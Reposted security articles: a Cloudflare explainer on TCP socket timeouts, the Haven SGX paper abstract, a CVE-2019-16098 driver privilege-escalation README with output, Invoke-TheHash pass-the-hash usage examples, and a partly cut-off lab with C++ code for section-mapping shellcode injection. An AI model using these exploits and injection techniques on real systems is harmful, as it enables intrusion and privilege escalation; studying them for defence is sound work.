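sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Keep the connection in SYN-RECV until data arrives, for up to ~8s.
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_DEFER_ACCEPT, 8)
sock.bind(("0.0.0.0", 4321))
sock.listen(16)

# accept() only returns once the peer has sent actual payload
# (or the defer-accept timer has expired) - watch it with `ss -o`.
conn, addr = sock.accept()
print(addr, conn.recv(1024))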
Idle ESTAB is forever

Let's move on and discuss a fully-established socket connected to an unhealthy (dead) peer. After completion of the handshake, the sockets on both sides move to the ESTABLISHED state, like:

State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 0      0      host:2     host:1
ESTAB 0      0      host:1     host:2

These sockets have no running timer by default - they will remain in that state forever, even if the communication is broken. The TCP stack will notice problems only when one side attempts to send something. This raises a question - what to do if you don't plan on sending any data over a connection? How do you make sure an idle connection is healthy, without sending any data over it?

This is where TCP keepalives come in. Let's see them in action - in this example we used the following toggles:

SO_KEEPALIVE = 1 - Enable keepalives.
TCP_KEEPIDLE = 5 - Send the first keepalive probe after 5 seconds of idleness.
TCP_KEEPINTVL = 3 - Send subsequent keepalive probes after 3 seconds.
TCP_KEEPCNT = 3 - Time out after three failed probes.

$ sudo ./test-idle.py
00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.]
State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 0      0      host:1     host:2
ESTAB 0      0      host:2     host:1 timer:(keepalive,2.992ms,0)
# all subsequent packets dropped
00:05.083 IP host.2 > host.1: Flags [.], ack 1 # first keepalive probe
00:08.155 IP host.2 > host.1: Flags [.], ack 1 # second keepalive probe
00:11.231 IP host.2 > host.1: Flags [.], ack 1 # third keepalive probe
00:14.299 IP host.2 > host.1: Flags [R.], seq 1, ack 1

Indeed! We can clearly see the first probe sent at the 5s mark, and the two remaining probes 3s apart - exactly as we specified. After a total of three sent probes, and a further three seconds of delay, the connection dies with ETIMEDOUT, and the final RST is transmitted. For keepalives to work, the send buffer must be empty. You can notice the keepalive timer active in the "timer:(keepalive)" line.

Keepalives with TCP_USER_TIMEOUT are confusing

We mentioned the TCP_USER_TIMEOUT option before. It sets the maximum amount of time that transmitted data may remain unacknowledged before the kernel forcefully closes the connection. On its own, it doesn't do much in the case of idle connections. The sockets will remain ESTABLISHED even if the connectivity is dropped. However, this socket option does change the semantics of TCP keepalives. The tcp(7) manpage is somewhat confusing:

Moreover, when used with the TCP keepalive (SO_KEEPALIVE) option, TCP_USER_TIMEOUT will override keepalive to determine when to close a connection due to keepalive failure.

The original commit message has slightly more detail: tcp: Add TCP_USER_TIMEOUT socket option.

To understand the semantics, we need to look at the kernel code in linux/net/ipv4/tcp_timer.c:693:

if ((icsk->icsk_user_timeout != 0 &&
    elapsed >= msecs_to_jiffies(icsk->icsk_user_timeout) &&
    icsk->icsk_probes_out > 0) ||

For the user timeout to have any effect, icsk_probes_out must not be zero. The check for user timeout is done only after the first probe went out. Let's check it out. Our connection settings:

TCP_USER_TIMEOUT = 5*1000 - 5 seconds
SO_KEEPALIVE = 1 - enable keepalives
TCP_KEEPIDLE = 1 - send first probe quickly - 1 second idle
TCP_KEEPINTVL = 11 - subsequent probes every 11 seconds
TCP_KEEPCNT = 3 - send three probes before timing out

00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.]
# all subsequent packets dropped
00:01.001 IP host.2 > host.1: Flags [.], ack 1 # first probe
00:12.233 IP host.2 > host.1: Flags [R.] # timer for second probe fired, socket aborted due to TCP_USER_TIMEOUT

So what happened? The connection sent the first keepalive probe at the 1s mark. Seeing no response, the TCP stack then woke up 11 seconds later to send a second probe. This time though, it executed the USER_TIMEOUT code path, which decided to terminate the connection immediately.

What if we bump TCP_USER_TIMEOUT to larger values, say between the second and third probe? Then, the connection will be closed on the third probe timer. With TCP_USER_TIMEOUT set to 12.5s:

00:01.022 IP host.2 > host.1: Flags [.] # first probe
00:12.094 IP host.2 > host.1: Flags [.] # second probe
00:23.102 IP host.2 > host.1: Flags [R.] # timer for third probe fired, socket aborted due to TCP_USER_TIMEOUT

We've shown how TCP_USER_TIMEOUT interacts with keepalives for small and medium values. The last case is when TCP_USER_TIMEOUT is extraordinarily large. Say we set it to 30s:

00:01.027 IP host.2 > host.1: Flags [.], ack 1 # first probe
00:12.195 IP host.2 > host.1: Flags [.], ack 1 # second probe
00:23.207 IP host.2 > host.1: Flags [.], ack 1 # third probe
00:34.211 IP host.2 > host.1: Flags [.], ack 1 # fourth probe! But TCP_KEEPCNT was only 3!
00:45.219 IP host.2 > host.1: Flags [.], ack 1 # fifth probe!
00:56.227 IP host.2 > host.1: Flags [.], ack 1 # sixth probe!
01:07.235 IP host.2 > host.1: Flags [R.], seq 1 # TCP_USER_TIMEOUT aborts conn on 7th probe timer

We saw six keepalive probes on the wire! With TCP_USER_TIMEOUT set, the TCP_KEEPCNT is totally ignored. If you want TCP_KEEPCNT to make sense, the only sensible USER_TIMEOUT value is slightly smaller than:

TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT

Busy ESTAB socket is not forever

Thus far we have discussed the case where the connection is idle. Different rules apply when the connection has unacknowledged data in a send buffer. Let's prepare another experiment - after the three-way handshake, let's set up a firewall to drop all packets. Then, let's do a send on one end to have some dropped packets in flight. An experiment shows the sending socket dies after ~16 minutes:

00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.]
# All subsequent packets dropped
00:00.206 IP host.2 > host.1: Flags [P.], length 11 # first data packet
00:00.412 IP host.2 > host.1: Flags [P.], length 11 # early retransmit, doesn't count
00:00.620 IP host.2 > host.1: Flags [P.], length 11 # 1st retry
00:01.048 IP host.2 > host.1: Flags [P.], length 11 # 2nd retry
00:01.880 IP host.2 > host.1: Flags [P.], length 11 # 3rd retry
State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 0      0      host:1     host:2
ESTAB 0      11     host:2     host:1 timer:(on,1.304ms,3)
00:03.543 IP host.2 > host.1: Flags [P.], length 11 # 4th
00:07.000 IP host.2 > host.1: Flags [P.], length 11 # 5th
00:13.656 IP host.2 > host.1: Flags [P.], length 11 # 6th
00:26.968 IP host.2 > host.1: Flags [P.], length 11 # 7th
00:54.616 IP host.2 > host.1: Flags [P.], length 11 # 8th
01:47.868 IP host.2 > host.1: Flags [P.], length 11 # 9th
03:34.360 IP host.2 > host.1: Flags [P.], length 11 # 10th
05:35.192 IP host.2 > host.1: Flags [P.], length 11 # 11th
07:36.024 IP host.2 > host.1: Flags [P.], length 11 # 12th
09:36.855 IP host.2 > host.1: Flags [P.], length 11 # 13th
11:37.692 IP host.2 > host.1: Flags [P.], length 11 # 14th
13:38.524 IP host.2 > host.1: Flags [P.], length 11 # 15th
15:39.500 connection ETIMEDOUT

The data packet is retransmitted 15 times, as controlled by:

$ sysctl net.ipv4.tcp_retries2
net.ipv4.tcp_retries2 = 15

From the ip-sysctl.txt documentation:

The default value of 15 yields a hypothetical timeout of 924.6 seconds and is a lower bound for the effective timeout. TCP will effectively time out at the first RTO which exceeds the hypothetical timeout.

The connection indeed died at ~940 seconds. Notice the socket has the "on" timer running. It doesn't matter at all if we set SO_KEEPALIVE - when the "on" timer is running, keepalives are not engaged.

TCP_USER_TIMEOUT keeps on working though. The connection will be aborted exactly after the user-timeout specified time since the last received packet. With the user timeout set, the tcp_retries2 value is ignored.

Zero window ESTAB is... forever?

There is one final case worth mentioning. If the sender has plenty of data, and the receiver is slow, then TCP flow control kicks in. At some point the receiver will ask the sender to stop transmitting new data. This is a slightly different condition than the one described above. In this case, with flow control engaged, there is no in-flight or unacknowledged data. Instead the receiver throttles the sender with a "zero window" notification. Then the sender periodically checks if the condition is still valid with "window probes". In this experiment we reduced the receive buffer size for simplicity. Here's how it looks on the wire:

00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.], win 1152
00:00.000 IP host.2 > host.1: Flags [.]
00:00.202 IP host.2 > host.1: Flags [.], length 576 # first data packet
00:00.202 IP host.1 > host.2: Flags [.], ack 577, win 576
00:00.202 IP host.2 > host.1: Flags [P.], length 576 # second data packet
00:00.244 IP host.1 > host.2: Flags [.], ack 1153, win 0 # throttle it! zero-window
00:00.456 IP host.2 > host.1: Flags [.], ack 1 # zero-window probe
00:00.456 IP host.1 > host.2: Flags [.], ack 1153, win 0 # nope, still zero-window
State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 1152   0      host:1     host:2
ESTAB 0      129920 host:2     host:1 timer:(persist,048ms,0)

The packet capture shows a couple of things. First, we can see two packets with data, each 576 bytes long. They both were immediately acknowledged.
The second ACK had the "win 0" notification: the sender was told to stop sending data. But the sender is eager to send more! The last two packets show the first "window probe": the sender will periodically send payload-less "ack" packets to check if the window size has changed. As long as the receiver keeps on answering, the sender will keep on sending such probes forever. The socket information shows three important things:

The read buffer of the reader is filled - thus the "zero window" throttling is expected.
The write buffer of the sender is filled - we have more data to send.
The sender has a "persist" timer running, counting the time until the next "window probe".

In this blog post we are interested in timeouts - what will happen if the window probes are lost? Will the sender notice?

By default the window probe is retried 15 times - adhering to the usual tcp_retries2 setting. The TCP timer is in the persist state, so TCP keepalives will not be running. The SO_KEEPALIVE settings don't make any difference when window probing is engaged.

As expected, the TCP_USER_TIMEOUT toggle keeps on working. A slight difference is that, similarly to user-timeout on keepalives, it's engaged only when the retransmission timer fires. During such an event, if more than user-timeout seconds have passed since the last good packet, the connection will be aborted.

Note about using application timeouts

In the past we have shared an interesting war story: The curious case of slow downloads. Our HTTP server gave up on the connection after an application-managed timeout fired. This was a bug - a slow connection might have correctly, slowly drained the send buffer, but the application server didn't notice that. We abruptly dropped slow downloads, even though this wasn't our intention. We just wanted to make sure the client connection was still healthy. It would be better to use TCP_USER_TIMEOUT than rely on application-managed timeouts.

But this is not sufficient. We also wanted to guard against a situation where a client stream is valid, but is stuck and doesn't drain the connection. The only way to achieve this is to periodically check the amount of unsent data in the send buffer, and see if it shrinks at a desired pace. For typical applications sending data to the Internet, I would recommend:

Enable TCP keepalives. This is needed to keep some data flowing in the idle-connection case.
Set TCP_USER_TIMEOUT to TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT.
Be careful when using application-managed timeouts. To detect TCP failures use TCP keepalives and user-timeout. If you want to spare resources and make sure sockets don't stay alive for too long, consider periodically checking if the socket is draining at the desired pace.

You can use ioctl(TIOCOUTQ) for that, but it counts both data buffered (notsent) on the socket and in-flight (unacknowledged) bytes. A better way is to use the TCP_INFO tcpi_notsent_bytes parameter, which reports only the former counter. An example of checking the draining pace:

while True:
    notsent1 = get_tcp_info(c).tcpi_notsent_bytes
    notsent1_ts = time.time()
    ...
    poll.poll(POLL_PERIOD)
    ...
    notsent2 = get_tcp_info(c).tcpi_notsent_bytes
    notsent2_ts = time.time()
    pace_in_bytes_per_second = (notsent1 - notsent2) / (notsent2_ts - notsent1_ts)
    if pace_in_bytes_per_second > 12000:
        # pace is above effective rate of 96Kbps, ok!
    else:
        # socket is too slow...

There are ways to further improve this logic.
We could use TCP_NOTSENT_LOWAT, although it's generally only useful for situations where the send buffer is relatively empty. Then we could use the SO_TIMESTAMPING interface for notifications about when data gets delivered. Finally, if we are done sending the data to the socket, it's possible to just call close() and defer handling of the socket to the operating system. Such a socket will be stuck in FIN-WAIT-1 or LAST-ACK state until it correctly drains.

Summary

In this post we discussed five cases where the TCP connection may notice the other party going away:

SYN-SENT: The duration of this state can be controlled by TCP_SYNCNT or tcp_syn_retries.
SYN-RECV: It's usually hidden from the application. It is tuned by tcp_synack_retries.
Idling ESTABLISHED connection: will never notice any issues. A solution is to use TCP keepalives.
Busy ESTABLISHED connection: adheres to the tcp_retries2 setting, and ignores TCP keepalives.
Zero-window ESTABLISHED connection: adheres to the tcp_retries2 setting, and ignores TCP keepalives.

Especially the last two ESTABLISHED cases can be customized with TCP_USER_TIMEOUT, but this setting also affects other situations. Generally speaking, it can be thought of as a hint to the kernel to abort the connection after so-many seconds since the last good packet. This is a dangerous setting though, and if used in conjunction with TCP keepalives it should be set to a value slightly lower than TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT. Otherwise it will affect, and potentially cancel out, the TCP_KEEPCNT value.

In this post we presented scripts showing the effects of timeout-related socket options under various network conditions. Interleaving the tcpdump packet capture with the output of ss -o is a great way of understanding the networking stack. We were able to create reproducible test cases showing the "on", "keepalive" and "persist" timers in action. This is a very useful framework for further experimentation.

Finally, it's surprisingly hard to tune a TCP connection to be confident that the remote host is actually up. During our debugging we found that looking at the send buffer size and the currently active TCP timer can be very helpful in understanding whether the socket is actually healthy. The bug in our Spectrum application turned out to be a wrong TCP_USER_TIMEOUT setting - without it, sockets with large send buffers were lingering around for way longer than we intended.

The scripts used in this article can be found on our Github. Figuring this out has been a collaboration across three Cloudflare offices. Thanks to Hiren Panchasara from San Jose, Warren Nelson from Austin and Jakub Sitnicki from Warsaw. Fancy joining the team? Apply here!

Sursa: https://blog.cloudflare.com/when-tcp-sockets-refuse-to-die/
-
Shielding applications from an untrusted cloud with Haven
Andrew Baumann, Marcus Peinado, Galen Hunt
11th USENIX Symposium on Operating Systems Design and Implementation (OSDI '14) | October 2014
Published by USENIX - Advanced Computing Systems Association
Best Paper Award

Today's cloud computing infrastructure requires substantial trust. Cloud users rely on both the provider's staff and its globally-distributed software/hardware platform not to expose any of their private data. We introduce the notion of shielded execution, which protects the confidentiality and integrity of a program and its data from the platform on which it runs (i.e., the cloud operator's OS, VM and firmware). Our prototype, Haven, is the first system to achieve shielded execution of unmodified legacy applications, including SQL Server and Apache, on a commodity OS (Windows) and commodity hardware. Haven leverages the hardware protection of Intel SGX to defend against privileged code and physical attacks such as memory probes, but also addresses the dual challenges of executing unmodified legacy binaries and protecting them from a malicious host. This work motivated recent changes in the SGX specification.

Sursa: https://www.microsoft.com/en-us/research/publication/shielding-applications-from-an-untrusted-cloud-with-haven/
-
CVE-2019-16098

The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code. For more updates, visit CVE-2019-16098.

WARNING: Hardcoded Windows 10 x64 Version 1903 offsets!

Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
Barakat

C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...

Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
SYSTEM

Sursa: https://github.com/Barakat/CVE-2019-16098
-
Invoke-TheHash

Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.

Requirements

Minimum PowerShell 2.0

Import

Import-Module ./Invoke-TheHash.psd1

or

. ./Invoke-WMIExec.ps1
. ./Invoke-SMBExec.ps1
. ./Invoke-SMBEnum.ps1
. ./Invoke-SMBClient.ps1
. ./Invoke-TheHash.ps1

Functions

Invoke-WMIExec
Invoke-SMBExec
Invoke-SMBEnum
Invoke-SMBClient
Invoke-TheHash

Invoke-WMIExec

WMI command execution function.

Parameters:
Target - Hostname or IP address of target.
Username - Username to use for authentication.
Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash have access to WMI on the target.
Sleep - Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds.

Example:

Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

Screenshot:

Invoke-SMBExec

SMB (PsExec) command execution function supporting SMB1, SMB2.1, with and without SMB signing.

Parameters:
Target - Hostname or IP address of target.
Username - Username to use for authentication.
Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash have access to SCM on the target.
CommandCOMSPEC - Default = Enabled: Prepend %COMSPEC% /C to Command.
Service - Default = 20 Character Random: Name of the service to create and delete on the target.
Sleep - Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds.
Version - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target.

Example:

Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

Example: Check SMB signing requirements on target.

Invoke-SMBExec -Target 192.168.100.20

Screenshot:

Invoke-SMBEnum

Invoke-SMBEnum performs User, Group, NetSession and Share enumeration tasks over SMB2.1 with and without SMB signing.

Parameters:
Target - Hostname or IP address of target.
Username - Username to use for authentication.
Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
Action - (All,Group,NetSession,Share,User) Default = Share: Enumeration action to perform.
Group - Default = Administrators: Group to enumerate.
Sleep - Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds.
Version - Default = Auto: (Auto,1,2.1) Force SMB version.
The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. Note, only the signing check works with SMB1.

Example:
Invoke-SMBEnum -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -verbose

Screenshot:

Invoke-SMBClient

SMB client function supporting SMB2.1 and SMB signing. This function primarily provides SMB file share capabilities for working with hashes that do not have remote command execution privilege. This function can also be used for staging payloads for use with Invoke-WMIExec and Invoke-SMBExec. Note that Invoke-SMBClient is built on the .NET TCPClient and does not use the Windows SMB client; Invoke-SMBClient is much slower than the Windows client.

Parameters:
Username - Username to use for authentication.
Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
Action - Default = List: (List/Recurse/Delete/Get/Put) Action to perform.
  List: Lists the contents of a directory.
  Recurse: Lists the contents of a directory and all subdirectories.
  Delete: Deletes a file.
  Get: Downloads a file.
  Put: Uploads a file and sets the creation, access, and last write times to match the source file.
Source -
  List and Recurse: UNC path to a directory.
  Delete: UNC path to a file.
  Get: UNC path to a file.
  Put: File to upload. If a full path is not specified, the file must be in the current directory. When using the 'Modify' switch, 'Source' must be a byte array.
Destination -
  List and Recurse: Not used.
  Delete: Not used.
  Get: If used, the value will be the new filename of the downloaded file. If a full path is not specified, the file will be created in the current directory.
  Put: UNC path for the uploaded file. The filename must be specified.
Modify -
  List and Recurse: The function will output an object consisting of directory contents.
  Delete: Not used.
  Get: The function will output a byte array of the downloaded file instead of writing the file to disk. It's advisable to use this only with smaller files and to send the output to a variable.
  Put: Uploads a byte array to a new destination file.
NoProgress - Prevents displaying an upload and download progress bar.
Sleep - Default = 100 Milliseconds: Sets the function's Start-Sleep values in milliseconds.
Version - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. Note, only the signing check works with SMB1.

Example: List the contents of a root share directory.
Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Source \\server\share -verbose

Example: Recursively list the contents of a share starting at the root.
Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share

Example: Recursively list the contents of a share subdirectory and return only the contents output to a variable.
$directory_contents = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share\subdirectory -Modify

Example: Delete a file on a share.
Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\file.txt

Example: Delete a file in subdirectories within a share.
Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\subdirectory\subdirectory\file.txt

Example: Download a file from a share.
Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt

Example: Download a file from within a share subdirectory and set a new filename.
Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\subdirectory\file.txt -Destination file.txt

Example: Download a file from a share to a byte array variable instead of disk.
$password_file = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt -Modify

Example: Upload a file to a share subdirectory.
Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source file.exe -Destination \\server\share\subdirectory\file.exe

Example: Upload a file to a share from a byte array variable.
Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source $file_byte_array -Destination \\server\share\file.txt -Modify

Screenshot:

Invoke-TheHash

Function for running Invoke-TheHash functions against multiple targets.

Parameters:
Type - Sets the desired Invoke-TheHash function. Set to either SMBClient, SMBEnum, SMBExec, or WMIExec.
Target - List of hostnames, IP addresses, CIDR notation, or IP ranges for targets.
TargetExclude - List of hostnames, IP addresses, CIDR notation, or IP ranges to exclude from the list of targets.
PortCheckDisable - (Switch) Disable WMI or SMB port check. Since this function is not yet threaded, the port check serves to speed up the function by checking for an open WMI or SMB port before attempting a full synchronous TCPClient connection.
PortCheckTimeout - Default = 100: Set the no-response timeout in milliseconds for the WMI or SMB port check.
Username - Username to use for authentication.
Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
Hash - NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format.
Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash have access to WMI or SCM on the target.
CommandCOMSPEC - Default = Enabled: SMBExec type only. Prepend %COMSPEC% /C to Command.
Service - Default = 20 Character Random: SMBExec type only. Name of the service to create and delete on the target.
SMB1 - (Switch) Force SMB1. SMBExec type only. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target.
Sleep - Default = WMI 10 Milliseconds, SMB 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds.

Example:
Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0

Screenshot:

Sursa: https://github.com/Kevin-Robertson/Invoke-TheHash/
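A note on the Hash parameter used by all of these functions: it expects the 32-hex-character NT hash (optionally prefixed with the LM hash as LM:NTLM). If you only hold a plaintext password, the NT hash is simply MD4 over the password's UTF-16LE encoding. A quick, hedged Python sketch (note that some OpenSSL 3.x builds no longer expose MD4 to hashlib, in which case this raises ValueError):

import hashlib

def nt_hash(password: str) -> str:
    # NT hash = MD4(UTF-16LE(password)), rendered as hex for the -Hash parameter
    return hashlib.new("md4", password.encode("utf-16le")).hexdigest().upper()

print(nt_hash("Summer2019!"))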
-
NtCreateSection + NtMapViewOfSection Code Injection

Overview

This lab is for a code injection technique that leverages the Native APIs NtCreateSection, NtMapViewOfSection and RtlCreateUserThread.

A section is a memory block that is shared between processes and can be created with the NtCreateSection API. Before a process can read/write to that block of memory, it has to map a view of the said section, which can be done with NtMapViewOfSection. Multiple processes can read from and write to the section through the mapped views.

High-level overview of the technique:

Create a new memory section with RWX protection.
Map a view of the previously created section to the local malicious process with RW protection.
Map a view of the previously created section to a remote target process with RX protection. Note that by mapping the views with RW (locally) and RX (in the target process) we do not need to allocate memory pages with RWX, which may be frowned upon by some EDRs.
Fill the view mapped in the local process with shellcode. By definition, the mapped view in the target process will get filled with the same shellcode.
Create a remote thread in the target process and point it to the mapped view in the target process to trigger the shellcode.

Execution

Let's create a new memory section in the local process that will have RWX access rights set:

fNtCreateSection(&sectionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)&sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);

We can see the section got created and we obtained its handle 0x88.

Let's create an RW view of the section in our local process and obtain its address, which will get stored in localSectionAddress:

fNtMapViewOfSection(sectionHandle, GetCurrentProcess(), &localSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_READWRITE);

Let's create another view of the same section in a target process (notepad.exe, PID 6572 in our case), but this time with RX protection.
The memory address of the view will get stored in the remoteSectionAddress variable.

We can now copy the shellcode into our localSectionAddress, which will get automatically mirrored/reflected in the remoteSectionAddress, as it's a view of the same section shared between our local and target processes:

memcpy(localSectionAddress, buf, sizeof(buf));

Below shows how the localSectionAddress gets filled with the shellcode and, at the same time, the remoteSectionAddress at 0x000002614ed50000 inside notepad (on the right) gets filled with the same shellcode.

We can now create a remote thread inside notepad.exe and make the remoteSectionAddress its start address in order to trigger the shellcode:

fRtlCreateUserThread(targetHandle, NULL, FALSE, 0, 0, 0, remoteSectionAddress, NULL, &targetThreadHandle, NULL);

Code

#include <iostream>
#include <Windows.h>

#pragma comment(lib, "ntdll")

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _CLIENT_ID {
    PVOID UniqueProcess;
    PVOID UniqueThread;
} CLIENT_ID, *PCLIENT_ID;

using myNtCreateSection = NTSTATUS(NTAPI*)(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL);

using myNtMapViewOfSection = NTSTATUS(NTAPI*)(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect);

using myRtlCreateUserThread = NTSTATUS(NTAPI*)(IN HANDLE ProcessHandle, IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, IN BOOLEAN CreateSuspended, IN ULONG StackZeroBits, IN OUT PULONG StackReserved, IN OUT PULONG StackCommit, IN PVOID StartAddress, IN PVOID StartParameter OPTIONAL, OUT PHANDLE ThreadHandle, OUT PCLIENT_ID ClientID);

int main()
{
    unsigned char buf[] =
